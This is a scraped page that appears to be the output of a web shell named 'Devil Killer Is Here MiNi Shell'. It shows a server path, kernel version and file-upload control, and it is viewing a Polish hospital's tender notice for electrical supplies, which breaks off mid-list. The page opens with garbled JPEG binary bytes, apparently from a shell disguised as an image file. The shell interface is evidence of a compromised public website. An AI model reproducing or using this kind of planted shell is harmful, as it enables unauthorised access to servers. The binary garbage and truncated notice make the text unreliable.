JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241016/0054817101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> (DFP.271.170.2024.ADB) Dostawa materiałów technicznych i elektrycznych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ SZPITAL UNIWERSYTECKI W KRAKOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288685</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mikołaja Kopernika 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-501</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 424 78 05</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">aburszczan@su.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.su.krakow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> (DFP.271.170.2024.ADB) Dostawa materiałów technicznych i elektrycznych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f861b14c-4478-46e3-94b0-92b9ad63ab20</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00548171</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00007586/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Materiały techniczne i elektryczne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/999264 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/su_krakow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w szczególności składanie ofert, wszelkich oświadczeń, wniosków, zawiadomień oraz informacji odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej:<br/>https://platformazakupowa.pl/pn/su_krakow.<br/>2. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania, zmiany i wycofania ofert, oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>3. Podmiotowe środki dowodowe, zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, niewystawione przez upoważnione podmioty, oraz pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>4. W przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>5. Komunikacja między zamawiającym a wykonawcami odbywa się za pośrednictwem platformy zakupowej i formularza „Wyślij wiadomość do zamawiającego”.<br/>6. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformy zakupowej poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>7. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>8. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>9. Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych sporządzania, wysyłania i odbierania plików w<br/>komunikacji elektronicznej znajdują się w pkt. 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO zawiera załącznik do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące RODO zawiera załącznik do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DFP.271.170.2024.ADB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 510000,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 357477,40 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Statecznik elektroniczny do opraw jarzeniowych 2x36W - 30	szt.<br/>2.	Statecznik elektroniczny do opraw jarzeniowych 4x18W	- 20	szt.<br/>3.	Statecznik elektroniczny do opraw jarzeniowych 1X54-58W/220-240V -	50	szt.<br/>4.	Starter zapłonnik do świetlówek będący własnością SU STARTER S10 4-65W - 100 szt.<br/>5.	Starter zapłonnik do świetlówek będący własnością SU STARTER S2 4-22W	- 100 szt.<br/>6.	UKŁAD ZAPŁONOWY 100-400W LAMPOWY SODOWY - 10	szt.<br/>7.	PRZEWÓD OMY 3X1,0 - 100 mb<br/>8.	PRZEWÓD OMY 3X1,5 - 100 mb<br/>9.	PRZEWÓD YDY 3X2,5/750V - 1 300 mb.<br/>10.	PRZEWÓD YDY 5X2,5/750V - 100 mb<br/>11.	PRZEWÓD YDY 3X1,5/750V - 1 300 mb<br/>12.	PRZEWÓD YDY 5X4 /750V - 100 mb<br/>13.	PRZEWÓD YDY 5X6 /750V - 100 mb<br/>14.	PRZEWÓD YDY 5X10/750V - 100	mb<br/>15.	PRZEWÓD YDYP 3X1,5/750V - 700 mb<br/>16.	PRZEWÓD YDYP 3X2,5/750V - 700 mb<br/>17.	PRZEWÓD OW 3X2,5/750V - 100	mb<br/>18.	PRZEWÓD OW 5X2,5/750V - 100	mb<br/>19.	PRZEWÓD UTP kat.5e 4X2X0,5 DRUT miedziany - 10000 mb<br/>20.	PRZEWÓD UTP kat.6 4X2X0,5 DRUT miedziany	- 10000 mb<br/>21.	GNIAZDO HERMETYCZNE podwójne z uziemieniem n/t - 50 szt.<br/>22.	GNIAZDO HERMETYCZNE POJEDYNCZE z uziemieniem n/t - 30	szt.<br/>23.	GNIAZDO P/T POJEDYNCZE białe z uziemieniem 16A, 250V, zaciski śrubowe, kompatybilne z będącym własnością SU osprzętem Simon Basic Standard - 200	szt.<br/>24.	GNIAZDO P/T PODWÓJNE białe z uziemieniem - 100 szt.<br/>25.	GNIAZDO Z/U BIAŁE - UCHYLNA OSŁONA, IP44 lub równoważny, 16A, 250V, zaciski śrubowe, kompatybilne z będącym własnością SU osprzętem Simon Basic Standard - 50 szt.<br/>26.	GNIAZDO SIŁOWE 5P-16A, stałe - 3 szt.<br/>27.	GNIAZDO TABLICOWE SKOŚNE 16A 5P 400V /80X97/ CZERWONE IP44- 5 szt.<br/>28.	GNIAZDO SIŁOWE 5P-32A , stałe - 3	szt.<br/>29.	&#34;Oprawa hermetyczna 2x36W OPK-236 IP65 bądź oprawy na tuby ledowe lub wersji led o tych samych wymiarach i parametrach - 5 szt.<br/>30.	Oprawa świetlówkowa do sufitów podwieszanych klosz mleczny 4 X 18W o wymiarach 60cm x 60cm bądź oprawy na tuby ledowe lub wersji led o tych samych wymiarach i parametrach - 5 szt.<br/>31.	Oprawa świetlówkowa rastrowa 4 x 18 W do sufitów podwieszanych o wymiarach 60cm x 60cm bądź oprawy na tuby ledowe lub wersji led o tych samych wymiarach i parametrach - 10 szt.<br/>32.	Oprawa świetlówkowa natynkowa 2x 36 W klosz opalizowany na świetlówki liniowe T8 bądź oprawy na tuby ledowe lub wersji led o tych samych wymiarach i parametrach - 20 szt.<br/>33.	Oprawa świetlówkowa 2x28W liniowa, aluminium, na świetlówki T5 podwieszana, możliwość regulacji wysokości wraz z kpl. Zawiesi bądź oprawy na tuby ledowe lub wersji led o tych samych wymiarach i parametrach - 20 szt.<br/>34.	Gniazdo gumowe 16A proste IP44 lub równoważne z uziemieniem przenośne - 5	szt.<br/>35.	Plafoniera natynkowa 1x75W E27 Ikl. 230V IP44 lub równoważne - kolor biały, klosz matowy biały, średnica klosza 300 mm - 10 szt.<br/>36.	PUSZKA P/T 60 MM DO ZESTAWÓW - 100 szt.<br/>37.	PUSZKA P/T 60 MM DO ZESTAWÓW POGŁĘBIANA - 100 szt.<br/>38.	PUSZKA P/T 80 MM - 10 szt.<br/>39.	PUSZKA P/T 60MM PKD 60 DO SUCHEGO TYNKU - 100 szt.<br/>40.	PUSZKA N/T Hermetyczna kwadratowa 75 X 75 X 40 MM IP54 - 100 szt.<br/>41.	PUSZKA N/T Hermetyczna kwadratowa 100 X 100 X 50 MM IP54 - 30 szt.<br/>42.	&#34;Ramka 1- krotna – kompatybilna z będącym własnością SU osprzętem Simon Basic Standard - 200	szt.<br/>43.	&#34;Ramka 2 - krotna – kompatybilna z będącym własnością SU osprzętem Simon Basic Standard - 100	szt.<br/>44.	&#34;Ramka 3 - krotna – kompatybilna z będącym własnością SU osprzętem Simon Basic Standard - 200	szt.<br/>45.	&#34;Ramka 4 - krotna – kompatybilna z będącym własnością SU osprzętem Simon Basic Standard - 100	szt.<br/>46.	&#34;Ramka 5 - krotna – kompatybilna z będącym własnością SU osprzętem Simon Basic Standard - 200	szt.<br/>47.	Rozdzielnica elektryczna modułowa natynkowa IP40 lub równoważne, drzwi przeźroczyste 3x12 mod - 1 szt.<br/>48.	ROZŁĄCZNIK FR-103 63A - 2 szt.<br/>49.	Rura kablowa RL22 biała 3 metry - 20 szt.<br/>50.	Rura kablowa RL28 biała 3 metry - 20 szt.<br/>51.	Uchwyt UZ 22 biały - 100 szt.<br/>52.	Uchwyt UZ 28 biały - 100 szt.<br/>53.	Złączka ZCLF 22 biała - 50 szt.<br/>54.	Złączka ZCLF 28 biała - 50 szt.<br/>55.	Wkładka topikowa WTS 10A - 20 szt.<br/>56.	Wkładka topikowa WTS 16A - 20 szt.<br/>57.	Wkładka topikowa WTS 20A - 20 szt.<br/>58.	Wkładka topikowa WTS 25A - 20 szt.<br/>59.	Wkładka bezpiecznikowa NH00 20A - 10 szt.<br/>60.	Wkładka bezpiecznikowa NH00 25A - 10 szt.<br/>61.	Wkładka bezpiecznikowa NH00 32A - 10 szt.<br/>62.	Wkładka bezpiecznikowa NH00 63A - 10 szt.<br/>63.	Wkładka bezpiecznikowa NH00 100A - 10 szt.<br/>64.	Wkładka bezpiecznikowa NH00 160A - 10 szt.<br/>65.	Wkładka bezpiecznikowa NH2C 32A - 10 szt.<br/>66.	Wkładka bezpiecznikowa NH2C 63A - 10 szt.<br/>67.	Wkładka bezpiecznikowa NH2C 80A - 10 szt.<br/>68.	Wkładka bezpiecznikowa NH2C 100A	- 10 szt.<br/>69.	Wkładka bezpiecznikowa NH2C 160A	- 10 szt.<br/>70.	Wkładka bezpiecznikowa NH2C 200A	- 10 szt.<br/>71.	Wkładka bezpiecznikowa NH2C 250A	- 10 szt.<br/>72.	WTYCZKA SIŁOWA 32A 5 BOLCE - 3	szt.<br/>73.	WTYCZKA SIŁOWA 16A 5 BOLCE - 3	szt.<br/>74.	WTYCZKA 1-fazowa 16A z uziemieniem, wersja kątowa - 50	szt.<br/>75.	WYŁĄCZNIK HERMETYCZNY POJEDYŃCZY.WNT-100C N/T - 10	szt.<br/>76.	WYŁĄCZNIK HERMETYCZNY PODWÓJNY.WNT-100C N/T - 10 szt.<br/>77.	WYŁĄCZNIK HERMET.PRZYCISK-DZWON. WNT-101C - 5 szt.<br/>78.	WYŁĄCZNIK P/T PODWÓJNY Z KLAWISZAMI kompatybilny z będącym własnością SU osprzętem Simon Basic Standard - 100 szt.<br/>79.	WYŁĄCZNIK P/T POJEDYNCZY Z KLAWISZAMI kompatybilny z będącym własnością SU osprzętem Simon Basic Standard - 100 szt.<br/>80.	WYŁĄCZNIK NADPRĄDOWY S-301 B-10A - 10	szt.<br/>81.	WYŁĄCZNIK NADPRĄDOWY S-301 B-16A - 10 szt.<br/>82.	WYŁĄCZNIK NADPRĄDOWY S-301 B-20A - 10	szt.<br/>83.	WYŁĄCZNIK NADPRĄDOWY S-301 B 25A - 10	szt.<br/>84.	WYŁĄCZNIK NADPRĄDOWY S-301 C-10A - 10 szt.<br/>85.	WYŁĄCZNIK NADPRĄDOWY S-301 C-16A - 10 szt.<br/>86.	WYŁĄCZNIK NADPRĄDOWY S-301 C-20A - 10 szt.<br/>87.	WYŁĄCZNIK NADPRĄDOWY S-301 C-25A - 10 szt.<br/>88.	WYŁĄCZNIK NADPRĄDOWY S-302B-10A - 5 szt.<br/>89.	WYŁĄCZNIK NADPRĄDOWY S-302B-16A - 5 szt.<br/>90.	WYŁĄCZNIK NADPRĄDOWY S-303B-16A - 5 szt.<br/>91.	WYŁĄCZNIK NADPRĄDOWY S-303 C-16A - 5 szt.<br/>92.	WYŁĄCZNIK NADPRĄDOWY S-303 B-20A - 5 szt.<br/>93.	WYŁĄCZNIK NADPRĄDOWY S-303 C-20A - 5 szt.<br/>94.	WYŁĄCZNIK NADPRĄDOWY S-303 B-25A - 5 szt.<br/>95.	WYŁĄCZNIK NADPRĄDOWY S-303 C-25A - 5 szt.<br/>96.	WYŁĄCZNIK NADPRĄDOWY S-303 B-32A - 5 szt.<br/>97.	WYŁĄCZNIK NADPRĄDOWY S-303 C-32A - 5 szt.<br/>98.	PRZEKAŹNIK BISTABILNY PB-301 16A / PB-401 16A	2	szt.<br/>99.	SZYNA ŁĄCZENIOWA DO APARATURY MODUŁOWEJ 12 MOD - 3 FAZOWE, prąd znamionowy - 63A - 2 szt.<br/>100. WYŁĄCZNIK RÓŻNICOWO-PRĄD.P304 25A 30MA - 3 FAZOWY - 3 szt.<br/>101. WYŁĄCZNIK RÓŻNICOWO-PRĄD.P304 40A 30MA - 3 FAZOWY - 3	szt.<br/>102. WYŁĄCZNIK RÓŻNICOWO-PRĄD.P302 25A 30MA - 1 FAZOWY - 5	szt.<br/>103. Wyłącznik Różnicowo-prądowy z członem nadprądowym 1P+N 6kA B 16A/30mA Typ AC - 20 szt.<br/>104. TAŚMA IZOLACYJNA MULTICOLOR - 300 szt.<br/>105. Taśma kablowa 300x5 mm (100szt) - 100	opak.<br/>106. Taśma kablowa 150x3 mm (100szt) - 50	opak. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 102407,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31680000-6 - Elektryczne artykuły i akcesoria</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Listwa elektroinstalacyjna PCV - 16x10 mm - 30 szt.<br/>2.	Listwa elektroinstalacyjna PCV - 20x18 mm - 30 szt.<br/>3.	Listwa elektroinstalacyjna PCV -25x15 mm - 50 szt.<br/>4.	Listwa elektroinstalacyjna PCV -60x25 mm - 50 szt.<br/>5.	Listwa elektroinstalacyjna PCV -60x40 mm - 50 szt.<br/>6.	Listwa elektroinstalacyjna PCV - 60x90 mm - 50 szt.<br/>7.	LISTWA ZACISKOWA LZ 2,5 MM - 20	szt.<br/>8.	LISTWA ZACISKOWA LZ 4 MM - 20 szt.<br/>9.	LISTWA ZACISKOWA LZ 6 MM - 20 szt.<br/>10.	LISTWA ZACISKOWA LZ 10 MM - 20 szt.<br/>11. ZAMEK SZYFROWY - 3	szt.<br/>12.	Oprawka plastikowa E-14 z pierścieniem - 10	szt.<br/>13.	Oprawka plastikowa E-27 z pierścieniem - 10	szt.<br/>14.	Złączka wago 4 polowa 2,5 mm, z dźwigniami zwalniającymi na przewód typu drut lub linka - 500 szt.<br/>15.	Złączka wago 3 polowa 2,5 mm z dźwigniami zwalniającymi na przewód typu drut lub linka - 500	szt.<br/>16.	Złączka wago 5 polowa 2,5 mm z dźwigniami zwalniającymi na przewód typu drut lub linka - 300	szt.<br/>17.	Symetryczny, rewersyjny, uniwersalny zaczep elektromagnetyczny z regulacją zapadki w zakresie 3 mm lub elektrozaczepy z serii R 4 i R5 - 10	szt.<br/>18.	Symetryczny, uniwersalny zaczep elektromagnetyczny z regulacją zapadki w zakresie 3 mm lub elektrozaczepy z serii R 4 i R5 - 10 szt.<br/>19.	Dzwonek bezprzewodowy - 20	szt.<br/>20.	OPRAWA PANEL LED 36W,barwa neutralna 4000K,3600lm do sufitów podwieszanych o wymiarach 60cm x 60cm - 100	szt.<br/>21.	Ramka do montażu N/T PANEL LED 36W, o wymiarach 60cm x 60cm kolor biały - 20 szt.<br/>22.	Wkładka topikowa D01 gL/gG 16A	- 20 szt.<br/>23.	Wkładka topikowa D02 gL/gG 20A	- 20 szt.<br/>24.	Wkładka topikowa D02 gL/gG 25A	- 20 szt.<br/>25.	Wkładka topikowa D02 gL/gG 32A	- 20 szt.<br/>26.	Wkładka topikowa D02 gL/gG 50A	- 20 szt.<br/>27.	Wkładka topikowa D02 gL/gG 63A	- 20 szt.<br/>28.	Oprawa downlight UFFO 245.LED 830 2250lm OPAL 30W IP40 BIAŁA -	10	szt.<br/>29.	Wtyczka gumowa 16A, IP44 lub równoważne, 1 fazowa	5	szt.<br/>30.	Przycisk pojedynczy zwierny bez piktogramu (moduł) 10AX, 250V, szybkozłącza; biały kompatybilny z będącym własnością SU osprzętem Simon Basic Standard - 30 szt.<br/>31.	Przycisk podwójny zwierny, dwuobwodowy: 2 wejścia, 2 wyjścia (moduł) 16AX, 250V, 